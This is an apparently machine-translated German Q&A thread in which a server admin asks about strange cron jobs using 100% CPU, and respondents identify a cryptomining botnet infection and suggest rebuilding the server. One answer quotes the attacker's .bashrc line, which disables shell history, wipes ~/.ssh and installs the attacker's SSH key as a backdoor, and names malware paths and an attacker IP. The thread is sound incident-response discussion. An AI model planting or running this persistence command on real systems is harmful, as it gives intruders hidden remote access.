Strange Cron Job beansprucht 100% des CPU Ubuntu 18 LTS Servers

21

Ich bekomme immer wieder krasse Jobs und ich habe keine Ahnung, was sie machen. Ich gebe normalerweise kill -9 aus, um sie zu stoppen. Sie beanspruchen 100% meiner CPU und können tagelang ausgeführt werden, bis ich sie überprüfe. Weiß jemand was das bedeutet?

sudo crontab -l
0 0 */3 * * /root/.firefoxcatche/a/upd>/dev/null 2>&1
@reboot /root/.firefoxcatche/a/upd>/dev/null 2>&1
5 8 * * 0 /root/.firefoxcatche/b/sync>/dev/null 2>&1
@reboot /root/.firefoxcatche/b/sync>/dev/null 2>&1
#5 1 * * * /tmp/.X13-unix/.rsync/c/aptitude>/dev/null 2>&1

Ich verwende einen Ubuntu 18 LTS-Server, der seit dem 24.07.2013 voll auf dem neuesten Stand ist

AKTUALISIEREN

Ich freue mich über jedes Feedback. Ich habe alle Daten- und Anwendungslaufwerke getrennt, da das einzige, was davon betroffen war, das Betriebssystem-Laufwerk war. Zumindest habe ich so etwas richtig gemacht. Ich gehe mit einem kompletten Umbau, mit viel mehr Sicherheit und sichereren Methoden.

server cron rsync MCP_infiltrator
quelle
8
.firefoxcatchehat wohl nichts mit firefox zu tun - könnte das nur ein bitcoin miner sein? Versuchen Sie, die ausführbaren Dateien auf virustotal hochzuladen.
Thom Wiggers
1
Die Dateien, die von dieser Crontab ausgeführt werden, sind /root/.firefoxcatche/a/updund/root/.firefoxcatche/b/sync
Thom Wiggers
2
"Ich kann die Crontab nicht finden, um sie herauszufiltern." Was bedeutet das? warum sollte sudo crontab -edas bearbeiten nicht funktionieren? Aber wenn dies ein Cryptominer ist, den Sie nicht installiert haben ... werden diese wieder hinzugefügt. 1. Schau in "/root/.firefoxcatche/a/upd" was es macht.
Rinzwind
2
"Muss ich mich als root anmelden, um dorthin zu gelangen?" Dies ist eine Frage, die ich von einem Administrator nicht erwartet habe. Sie müssen wirklich wissen, was Sie von nun an tun. Ändern Sie das Admin-Passwort so schnell wie möglich. Untersuchen Sie die in cron aufgelisteten Dateien. Beseitige sie.
Rinzwind
1
aber so einfach ist das ;-) ich pflege über 10 google cloud instanzen. Mit einem Notfallplan für alles, was ich mir vorstellen kann, schief zu gehen. Wenn so etwas passieren würde, würde ich die Root-Instanz zerstören, eine neue erstellen, die Datendisk gegen einen Klon scannen, die Unterschiede scannen und sie dann an die Instanz anhängen. und das Gerät, um diese Person in eine Falle zu locken, damit es nicht noch einmal passiert. In meinem Fall hängt mein Gehaltsscheck davon ab
;-)

Antworten:

40

Auf Ihrem Computer ist höchstwahrscheinlich eine Crypto Miner-Infektion aufgetreten. Sie können sehen, dass eine andere Person ähnliche Dateinamen und ähnliches Verhalten bei der Erkennung einer virtuellen Maschine in Azure mit Security Center im Real-Life- Modus meldet . Siehe auch Mein Ubuntu-Server hat einen Virus ... Ich habe ihn gefunden, kann ihn aber nicht entfernen ... auf Reddit.

Sie können diesem Computer nicht mehr vertrauen und sollten ihn neu installieren. Gehen Sie beim Wiederherstellen von Sicherungen vorsichtig vor.

Thom Wiggers
quelle
8
Genau. Das root-Passwort wurde kompromittiert. Installieren Sie es erneut und gehen Sie sehr vorsichtig mit dem Backup um. es könnte auch dort sein.
Rinzwind
9

Ihr Computer wurde mit einem Crypto Miner-Angriff infiziert. Ich hatte in der Vergangenheit auch einen ähnlichen Ransomware-Angriff und meine Datenbank war kompromittiert. Ich habe einen SQL-Speicherauszug für die Maschine erstellt und die Maschine erneut bereitgestellt (da meine Maschine eine auf AWS EC2 gehostete VM war). Ich habe auch die Sicherheitsgruppen des Computers geändert, um den SSH-Zugriff und geänderte Kennwörter zu sperren. Ich habe auch die Protokollierung aktiviert, um Abfragen zu protokollieren und sie jede Nacht nach S3 zu exportieren.

beingadityak
quelle
4

Das gleiche ist mir passiert und ich habe es gestern bemerkt. Ich habe die Datei überprüft /var/log/syslogund diese IP (185.234.218.40) schien automatisch Cronjobs auszuführen.

Ich habe es auf http://whatismyipaddress.com ( https://whatismyipaddress.com/ip/185.234.218.40 ) überprüft und es gibt einige Berichte. Diese Dateien wurden vom Trojaner bearbeitet:

  • .bashrc
  • .ssh / authorized_keys

Ich fand dies am Ende von .bashrc(was jedes Mal ausgeführt wird, wenn die Bash geöffnet wird):

set +o history
export PATH=/home/user/.bin:$PATH
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod 700 .ssh && cd .ssh && chmod 600 authorized_keys && cd ~

Es wird Ihre authorized_keysDatei gelöscht. Hierbei handelt es sich um eine Liste von SSH-Schlüsseln, die eine Verbindung ohne Kennwort herstellen dürfen. Dann wird der SSH-Schlüssel des Angreifers hinzugefügt:

ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr

Außerdem habe ich diesen Ordner gefunden:, /tmp/.X13-unix/.rsyncin dem sich die gesamte Malware befindet. Ich habe sogar eine Datei gefunden, /tmp/.X13-unix/.rsync/c/ipeine Datei mit 70 000 IP-Adressen, bei denen es sich höchstwahrscheinlich um andere Opfer oder Knotenserver handelt.

Es gibt 2 Lösungen: A:

  • Fügen Sie eine Firewall hinzu, die alle ausgehenden Verbindungen mit Ausnahme von Port 22 und anderen, die Sie für erforderlich halten, blockiert, und aktivieren Sie fail2ban, ein Programm, das eine IP-Adresse nach fehlgeschlagenen X-Kennwortversuchen sperrt

  • Beenden Sie alle Cron-Jobs: ps aux | grep cronund töten Sie dann die angezeigte PID

  • Ändern Sie Ihr Passwort in ein sicheres

B:

  • Sichern Sie alle Dateien oder Ordner, die Sie benötigen oder möchten

  • Setzen Sie den Server zurück und installieren Sie Ubuntu neu, oder erstellen Sie direkt ein neues Droplet

    Wie Thom Wiggers sagte, sind Sie sicherlich Teil eines Bitcoin-Mining-Botnets und Ihr Server hat eine Hintertür . Die Hintertür verwendet einen Perl-Exploit, eine Datei, die sich hier befindet: /tmp/.X13-unix/.rsync/b/run( https://pastebin.com/ceP2jsUy )

Die verdächtigsten Ordner, die ich gefunden habe, waren:

  • /tmp/.X13-unix/.rsync

  • ~/.bashrc (die bearbeitet wurde)

  • ~/.firefoxcatche

Schließlich gibt es hier einen Artikel zu Perl Backdoor: https://blog.trendmicro.com/trendlabs-security-intelligence/outlaw-hacking-groups-botnet-observed-spreading-miner-perl-based-backdoor/

Ich hoffe, Sie finden das nützlich.

Oqhax
quelle
Ich habe das OS-Laufwerk
gelöscht
Ja, das ist eine gute Lösung :)
Oqhax
Dies war eine sehr hilfreiche Antwort. Vielen Dank, dass Sie ~/.bashrcdie bearbeitete Datei abgefangen haben. Ich fand das, um den Schwindel zu töten, den rsyncich ausstellen musste kill -9 <pid>.
Benny Hill